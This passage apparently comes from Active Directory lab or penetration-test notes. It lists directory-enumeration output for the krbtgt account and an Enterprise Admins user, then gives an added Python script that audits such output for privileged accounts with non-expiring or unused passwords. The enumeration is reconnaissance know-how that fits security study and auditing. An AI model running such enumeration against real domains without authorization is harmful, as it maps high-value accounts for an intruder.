distinguishedname             : CN=krbtgt,CN=Users,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user}
name                          : krbtgt
showinadvancedviewonly        : True
objectsid                     : S-1-5-21-1135011135-3178090508-3151492220-502
samaccountname                : krbtgt
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : NEVER
cn                            : krbtgt
whenchanged                   : 7/15/2020 8:40:57 PM
instancetype                  : 4
usncreated                    : 12324
objectguid                    : a8468773-3587-4278-b288-222c30b2a742
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname          : kadmin/changepw
memberof                      : CN=Denied RODC Password Replication Group,CN=Users,DC=comply,DC=com
lastlogon                     : 12/31/1600 4:00:00 PM
badpasswordtime               : 12/31/1600 4:00:00 PM
badpwdcount                   : 0
useraccountcontrol            : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated                   : 7/15/2020 8:25:47 PM
countrycode                   : 0
primarygroupid                : 513
pwdlastset                    : 7/15/2020 1:25:47 PM
msds-supportedencryptiontypes : 0
usnchanged                    : 12830

logoncount            : 0
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Nicky,OU=ComAdmins,OU=ComUsers,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Nicky
userprincipalname     : [email protected]
name                  : Nicky
objectsid             : S-1-5-21-1135011135-3178090508-3151492220-1103
samaccountname        : nicky
admincount            : 1
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Nicky
whenchanged           : 7/15/2020 8:40:57 PM
instancetype          : 4
usncreated            : 12798
objectguid            : 42dc1442-d1f9-47ee-b1e3-84024b5e720c
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 1/1/1601 12:00:00 AM}
givenname             : Nicky
memberof              : CN=Enterprise Admins,CN=Users,DC=comply,DC=com
lastlogon             : 12/31/1600 4:00:00 PM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/15/2020 8:37:23 PM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 1:37:23 PM
usnchanged            : 12813
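
The same listings are what a directory hygiene review would read. As an added example (not from the original notes), this parses Get-DomainUser list output, including wrapped memberof lines, and flags enabled privileged accounts whose passwords never expire, are old, or have never been used; the sample is an excerpt of this page's output trimmed to the fields the check reads, and the finding names, privileged-group list and 365-day threshold are assumptions.

```python
import re
from datetime import datetime

# Excerpt of the Get-DomainUser output on this page, trimmed to the fields used.
SAMPLE = """\
logoncount             : 44
distinguishedname      : CN=Administrator,CN=Users,DC=ops,DC=comply,DC=com
admincount             : 1
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=ops,DC=comply,DC=com, CN=Domain
                         Admins,CN=Users,DC=ops,DC=comply,DC=com, CN=Administrators,CN=Builtin,DC=ops,DC=comply,DC=com}
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
pwdlastset             : 8/2/2020 10:51:52 AM

logoncount                    : 0
distinguishedname             : CN=krbtgt,CN=Users,DC=ops,DC=comply,DC=com
admincount                    : 1
memberof                      : CN=Denied RODC Password Replication Group,CN=Users,DC=ops,DC=comply,DC=com
useraccountcontrol            : ACCOUNTDISABLE, NORMAL_ACCOUNT
pwdlastset                    : 7/15/2020 1:43:38 PM

logoncount            : 4
distinguishedname     : CN=Nina,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
memberof              : CN=FileAdmin,OU=OpsGroups,DC=ops,DC=comply,DC=com
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
pwdlastset            : 7/15/2020 11:48:28 PM

logoncount            : 0
distinguishedname     : CN=Nicky,OU=ComAdmins,OU=ComUsers,DC=comply,DC=com
admincount            : 1
memberof              : CN=Enterprise Admins,CN=Users,DC=comply,DC=com
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
pwdlastset            : 7/15/2020 1:37:23 PM
"""

KEY_RE = re.compile(r"^([\w-]+)\s*: ?(.*)$")
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}


def parse_records(text):
    """Split list-format output into dicts; indented lines continue the previous value."""
    records, cur, last = [], {}, None
    for line in text.splitlines():
        if not line.strip():                      # blank line ends a record
            if cur:
                records.append(cur)
            cur, last = {}, None
            continue
        m = None if line[0].isspace() else KEY_RE.match(line)
        if m:
            last = m.group(1).lower()
            cur[last] = m.group(2).strip()
        elif last:                                # console-wrapped continuation
            cur[last] += " " + line.strip()
    if cur:
        records.append(cur)
    return records


def group_names(memberof):
    """Leading CN of each DN; DNs are separated by ', ', RDNs by ',' alone."""
    return re.findall(r"(?:^|\{|, )CN=([^,]+)", memberof)


def parse_when(value):
    try:
        ts = datetime.strptime(value, "%m/%d/%Y %I:%M:%S %p")
    except ValueError:
        return None
    return None if ts.year < 1700 else ts         # 12/31/1600 is the "never" value


def audit(records, as_of, max_age_days=365):
    report = []
    for r in records:
        uac = r.get("useraccountcontrol", "")
        groups = group_names(r.get("memberof", ""))
        privileged = r.get("admincount") == "1" or any(
            g.lower() in PRIVILEGED_GROUPS for g in groups)
        if not privileged or "ACCOUNTDISABLE" in uac:
            continue
        findings = []
        if "DONT_EXPIRE_PASSWORD" in uac:
            findings.append("password_never_expires")
        changed = parse_when(r.get("pwdlastset", ""))
        if changed and (as_of - changed).days > max_age_days:
            findings.append("stale_password")
        # logoncount is not replicated between DCs: this reflects the DC queried.
        if r.get("logoncount") == "0":
            findings.append("never_logged_on")
        if findings:
            report.append((r["distinguishedname"], groups, findings))
    return report


if __name__ == "__main__":
    for dn, groups, findings in audit(parse_records(SAMPLE), datetime(2022, 7, 31)):
        print(dn, groups, findings)
```
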

Found that [email protected] is a member of the [email protected] group: